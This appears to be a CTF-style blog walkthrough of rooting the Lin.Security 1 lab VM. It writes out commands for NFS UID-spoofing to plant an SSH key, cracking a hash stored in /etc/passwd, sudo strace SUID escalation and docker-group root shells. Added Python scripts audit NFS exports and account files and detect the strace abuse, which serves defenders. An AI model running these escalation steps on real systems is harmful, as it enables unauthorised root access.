Hello All,
This blog post is a walkthrough of the vulnerable Linux VM "Lin.Security 1".
Download link: https://www.vulnhub.com/entry/linsecurity-1,244/
After configuring the VM, I started with a port scan using Nmap.
The result was as follows:
Port 2049 is open; it belongs to the NFS share service.
To list the shares available on the machine, I ran the command below:
showmount -e Machine_IP
The share "/home/peter" is available to any IP.
Let's mount it on the attacker machine using the command below:
mount -t nfs -o nolock Machine_ip:share_name local_machine_directory
I mounted the NFS share on a directory named "b0x".
The ls -al command shows the content of the home directory of the user peter ("/home/peter").
Next, I checked the permissions of the mounted share using the command below:
stat b0x
After searching on the internet, I learned about an NFS share weakness according to which "to access NFS share, uid and gid need to match the ones of the shared directory on the server". In other words, the server trusts the UID and GID that the client presents.
Currently, the NFS share is owned by UID 1001 and GID 1005.
So we need a local OS user, here "ftp", with UID "1001" and GID "1005".
After changing the UID and GID of the OS user "ftp", switch to it and try to create a file, to confirm that we have the privilege to create files and directories on the mounted share.
Next, I created a ".ssh" directory on the mounted share and copied the "id_rsa.pub" key of the user "ftp" into it as "authorized_keys", so that I can SSH to the machine from my machine using the SSH key.
After pushing the SSH key file, we can log in to the machine using the command below:
ssh peter@machine_IP
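Seen from the server side, the weakness above is a home directory exported writable to any host, on which the server accepts whatever UID and GID the client presents. The following audit is an added example, not part of the original post; it flags such entries in an exports file. The sample entries are constructed (the post does not show the VM's /etc/exports) and only plain "client(options)" entries are handled.

```python
import re

# Constructed /etc/exports content; the post does not show the VM's real file.
SAMPLE_EXPORTS = """\
/home/peter  *(rw,sync,no_subtree_check)
/srv/backup  10.0.0.5(rw,sync,no_root_squash)
/srv/pub     192.168.56.0/24(ro,all_squash) *(ro)   # read-only, squashed
"""

WORLD = {"", "*", "0.0.0.0/0", "::/0"}   # client specs that mean "any host"
ENTRY_RE = re.compile(r"([^\s()]*)(?:\(([^)]*)\))?")


def parse_exports(text):
    """Yield (path, client, options) for each client on each export line."""
    text = text.replace("\\\n", " ")      # join backslash-continued lines
    for line in text.splitlines():
        fields = line.split("#", 1)[0].split()
        for token in fields[1:]:
            match = ENTRY_RE.fullmatch(token)
            if match:                      # malformed tokens are skipped
                client, opts = match.groups()
                yield fields[0], client, set((opts or "").split(","))


def audit_exports(text):
    """Return (path, client, finding) tuples for risky export entries."""
    findings = []
    for path, client, opts in parse_exports(text):
        who = client or "*"
        writable = "rw" in opts
        # Without all_squash the server honours the UID/GID sent by the client.
        if client in WORLD and writable and "all_squash" not in opts:
            findings.append((path, who, "any host may write using a UID/GID it chooses"))
        if "no_root_squash" in opts:
            findings.append((path, who, "remote root is not mapped to an anonymous UID"))
        if writable and (path + "/").startswith("/home/"):
            findings.append((path, who, "writable home directory exposes ~/.ssh/authorized_keys"))
    return findings


if __name__ == "__main__":
    for finding in audit_exports(SAMPLE_EXPORTS):
        print(*finding, sep="  ")
```

Restricting the client list to known hosts, exporting read-only, or adding all_squash each clears the first finding.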
Now we are inside the machine. I read the "/etc/passwd" file and found an entry for an OS user "insecurity" with UID 0 and a Unix hash in the "shadow masking" (password) field.
I searched about it and found that, on old systems, the "/etc/passwd" file used to hold the password hash of the OS user. So I cracked the hash using Hashcat and got the plaintext password.
I then logged in as the user "insecurity" using the recovered password and got root privileges on the machine. That is one method.
As the machine designer mentioned, there are multiple ways to root this machine, so I checked other possibilities as well and found that the user "peter" can run the "strace" binary with sudo privileges. I used the command below to check which binaries the user "peter" may run with sudo:
sudo -l
To take advantage of running "strace" with sudo, I planned to compile a C program that drops the user into a "/bin/sh" shell, then use sudo strace to change its ownership to the root user and make it a SUID binary.
Code of the C program which I used:
I compiled the program using the command below:
gcc r.c -o r
After compiling the code, I ran the command below to change the ownership of the compiled binary:
sudo /usr/bin/strace chown root:root r
Check whether the command executed successfully:
It worked, and the binary is now owned by "root".
To set the SUID bit on the file, I ran the command below using "strace" with sudo:
sudo /usr/bin/strace chmod u+s r
Let's check whether the binary has the SUID bit set by listing the file's permissions.
Great, the binary now has the SUID bit set as well. We just need to execute it: because its owner is the "root" user and the SUID bit is set, we will get a "/bin/sh" shell with the privileges of the "root" user.
Let's execute the binary and check whether we get "root" privileges by running the command below:
./r
And yes, it worked, and now we are in a root "/bin/sh" shell :)
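A defender can spot this sequence in sudo's own log, because both commands above are recorded with strace as the executed program. The detection below is an added example, not part of the original post; the log lines are constructed in sudo's syslog format, and the handling of strace options and chmod modes is simplified.

```python
import re

# Constructed auth.log lines in sudo's syslog format; host and times are made up.
SAMPLE_LOG = """\
Jul 10 10:01:02 box sudo:    peter : TTY=pts/0 ; PWD=/home/peter ; USER=root ; COMMAND=/usr/bin/strace chown root:root r
Jul 10 10:01:09 box sudo:    peter : TTY=pts/0 ; PWD=/home/peter ; USER=root ; COMMAND=/usr/bin/strace chmod u+s r
Jul 10 10:05:00 box sudo:    peter : TTY=pts/0 ; PWD=/home/peter ; USER=root ; COMMAND=/usr/bin/strace -p 812
"""

SUDO_RE = re.compile(r"sudo:\s+(\S+) : .*?\bUSER=(\S+) ; COMMAND=(.+)$")
VALUE_OPTS = {"-a", "-e", "-E", "-o", "-P", "-s", "-S", "-u"}  # options taking a value
# Symbolic mode adding "s" for user/all, or an octal mode with the 4000 bit.
SETUID_MODE = re.compile(
    r"^(?:(?:[ugoa]*[ua][ugoa]*)?[+=][rwxXst]*s[rwxXst]*|[0-7]*[4-7][0-7]{3})$")

def traced_command(argv):
    """Return the command strace would execute, or [] if it only attaches (-p)."""
    i = 1
    while i < len(argv) and argv[i].startswith("-"):
        if argv[i] == "-p":
            return []
        i += 2 if argv[i] in VALUE_OPTS else 1
    return argv[i:]

def detect(log_text):
    """Return (user, child command, reason) for commands run as root via sudo strace."""
    alerts = []
    for line in log_text.splitlines():
        match = SUDO_RE.search(line)
        if not match:
            continue
        user, run_as, command = match.groups()
        argv = command.split() or [""]
        if run_as != "root" or argv[0].rsplit("/", 1)[-1] != "strace":
            continue
        child = traced_command(argv)
        if not child:
            continue
        name = child[0].rsplit("/", 1)[-1]
        reason = "command executed as root through sudo strace"
        if name == "chmod" and any(SETUID_MODE.match(a) for a in child[1:]):
            reason = "setuid bit set through sudo strace"
        elif name == "chown" and child[1:] and child[1].split(":")[0] == "root":
            reason = "file ownership changed to root through sudo strace"
        alerts.append((user, " ".join(child), reason))
    return alerts

if __name__ == "__main__":
    print(*detect(SAMPLE_LOG), sep="\n")
```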
Using Docker
The machine is running Docker, and after a little searching I learned that if we have access to an OS user account that is a member of the "docker" group, we can get a root shell using the commands below:
docker run --privileged --interactive --tty --volume /:/host bash
docker run -v /:/hostOS -i -t chrisfosterelli/rootplease
The current user is a member of the "docker" group.
Let's get a root shell using the commands mentioned above xD
Using the first command:
Using the second command:
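Both the "/etc/passwd" finding earlier and the "docker" group membership used here can be caught by reading the account databases. The check below is an added example, not part of the original post; the sample passwd and group lines are constructed, and the 13-character rule for traditional DES crypt hashes is a heuristic.

```python
# Constructed sample data; the post does not reproduce the VM's real files.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
peter:x:1001:1005:Peter:/home/peter:/bin/bash
insecurity:AzExAmPlEhAsH:0:0::/:/bin/sh
"""
SAMPLE_GROUP = """\
adm:x:4:syslog
docker:x:999:peter
"""

HASH_PREFIXES = {"$1$": "md5crypt", "$5$": "sha256crypt", "$6$": "sha512crypt",
                 "$2": "bcrypt", "$y$": "yescrypt"}
ROOT_EQUIVALENT_GROUPS = {"docker"}   # the group this walkthrough relies on


def hash_scheme(field):
    """Name the scheme of a passwd password field, or None if it holds no hash."""
    if field in ("", "x") or field[0] in "*!":
        return None                    # empty, shadowed, or locked
    for prefix, name in HASH_PREFIXES.items():
        if field.startswith(prefix):
            return name
    return "descrypt" if len(field) == 13 else "unknown"


def audit_accounts(passwd_text, group_text):
    """Return (account, finding) tuples from passwd and group file contents."""
    findings = []
    for line in passwd_text.splitlines():
        parts = line.split(":")
        if len(parts) != 7:
            continue
        name, password, uid = parts[0], parts[1], parts[2]
        if uid == "0" and name != "root":
            findings.append((name, "extra UID 0 account"))
        if password == "":
            findings.append((name, "empty password field"))
        scheme = hash_scheme(password)
        if scheme:
            findings.append((name, f"{scheme} hash in world-readable /etc/passwd"))
    # Only supplementary members are listed here; primary GIDs are not checked.
    for line in group_text.splitlines():
        parts = line.split(":")
        if len(parts) == 4 and parts[0] in ROOT_EQUIVALENT_GROUPS:
            for member in filter(None, parts[3].split(",")):
                findings.append((member, f"member of root-equivalent group {parts[0]}"))
    return findings
```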
As the machine designer mentioned, there are multiple ways to get "root" privileges on the machine, so try to find other ways as well.
Thanks for reading.
--==[[ With Love from Team IndiShell ]]==--